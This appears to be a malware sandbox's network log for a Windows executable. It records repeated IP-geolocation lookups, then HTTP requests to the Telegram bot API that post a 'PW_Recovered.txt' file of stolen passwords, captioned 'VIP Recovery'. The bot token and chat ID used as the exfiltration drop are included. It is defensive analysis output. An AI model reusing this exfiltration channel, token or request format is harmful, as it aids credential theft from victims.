                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.749773104.21.112.14437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:06:28 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2025-01-10 22:06:29 UTC853INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:28 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1861578
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=39rVfg3BgC6AKstuD4weyiqIi7EBSaBlk2LWaQuABRLM83sVoGXFKqRpl9zl7MPYwEeOcrzS9hHQ5INV8B9nJPXaJKExdUnT1FwhxIKtjk5NXWeZ%2BF5dQ0mP6LN5bQwzZ9Hx%2BMp4"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ffff9769f01727b-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2001&min_rtt=1995&rtt_var=760&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1427872&cwnd=234&unsent_bytes=0&cid=daf4a28d8840a8a1&ts=166&x=0"
                                                                                                            2025-01-10 22:06:29 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.749784104.21.112.14437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:06:30 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 22:06:30 UTC853INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:30 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1861579
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lfn1FqyKFVq8lkUhMgDDawLL4DtfiiexX2BOQrrRmGp%2BfGBhGg7SgFwr90VG5ANnVkM4nL7UDeCuj%2BvOQP9NAl4m4HbeyMUkOvIVC4ZUFikxeUgDjppUvZsLvx801OUzz5GLfZx1"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ffff97ffd4b727b-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1966&rtt_var=744&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1462925&cwnd=234&unsent_bytes=0&cid=a9b0457a1b3542be&ts=138&x=0"
                                                                                                            2025-01-10 22:06:30 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.749796104.21.112.14437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:06:31 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 22:06:31 UTC859INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:31 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1861580
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kC%2FQnu07UBQJ1MR9WLt9XNYivstcLyz15iiqu1ZhIpg8moRnzvF6vQ8KAQLloeOArEqCdhA4rhuQSS4i6l4F7isJuBy%2FW6KihiTt3%2B%2BDwXgcjvHKQQ1QD2qq2LTI%2FQ8cwGa6joGv"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ffff987ed87c34f-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1444&min_rtt=1429&rtt_var=566&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1885087&cwnd=181&unsent_bytes=0&cid=d3aa17bf273dbae7&ts=163&x=0"
                                                                                                            2025-01-10 22:06:31 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.749807104.21.112.14437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:06:32 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 22:06:33 UTC853INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:33 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1861582
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uMggmLzPkzsjplLMkfqn4NuIz60hN7DteDXa9xbOKitWu3Sd0QBxmiKIqXmKseh8nMuvdsoWti7u82yqekzsQFFcDPtu%2FVFZIg183UhN7nPjY3wdptMk4pygYwZOZ3FAK4HvvHR%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ffff9906ee2729f-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1940&min_rtt=1932&rtt_var=741&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1460730&cwnd=169&unsent_bytes=0&cid=15ee9105ea77e036&ts=166&x=0"
                                                                                                            2025-01-10 22:06:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.749815104.21.112.14437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:06:34 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2025-01-10 22:06:34 UTC857INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:34 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1861583
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKhuY%2FhDosdS5EFtaOMszCJ45rgXQuMpFb8Fa7C4Hhc8NSVTXmdHEqn9WGQxho84YV9rN4OY13c%2FZmHF8x7CurF%2BzEGqEVMSEC3VCWSc0Dz8f0SLPzqx%2FOgAa1kJQfEad43W0Mlp"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ffff9983c4c424b-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1597&rtt_var=610&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1828428&cwnd=248&unsent_bytes=0&cid=5fe4d129dc8f0ab9&ts=139&x=0"
                                                                                                            2025-01-10 22:06:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.749827104.21.112.14437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:06:35 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 22:06:35 UTC855INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 22:06:35 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1861584
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9HJFJ26WlSAqedPrMiKQJXTd%2BUgPcVGc3RiF124nh2uW%2F5QyKlCkKo26uOnk8AcI0lD%2B6s5OhLjQcoo3NavGhKQPYkQ8UPoE5GscqFjXTh22S83jxusGxlWi522KPPKrP6KZZjtm"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ffff9a05ebc727b-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1981&rtt_var=746&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1474003&cwnd=234&unsent_bytes=0&cid=509c64459400fe69&ts=151&x=0"
                                                                                                            2025-01-10 22:06:35 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.749834149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:06:36 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:41:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                            Host: api.telegram.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 22:06:36 UTC344INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:06:36 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 55
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:06:36 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.749884149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:06:44 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd32713826b139
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:06:44 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 37 31 33 38 32 36 62 31 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd32713826b139Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:06:44 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:06:44 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:06:44 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 30 39 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 30 34 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":40994,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546804,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.749995149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:06 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3386f64b78bd
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:06 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 33 38 36 66 36 34 62 37 38 62 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd3386f64b78bdContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:07 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:07 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:07 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 30 39 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 32 37 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":40995,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546827,"document"


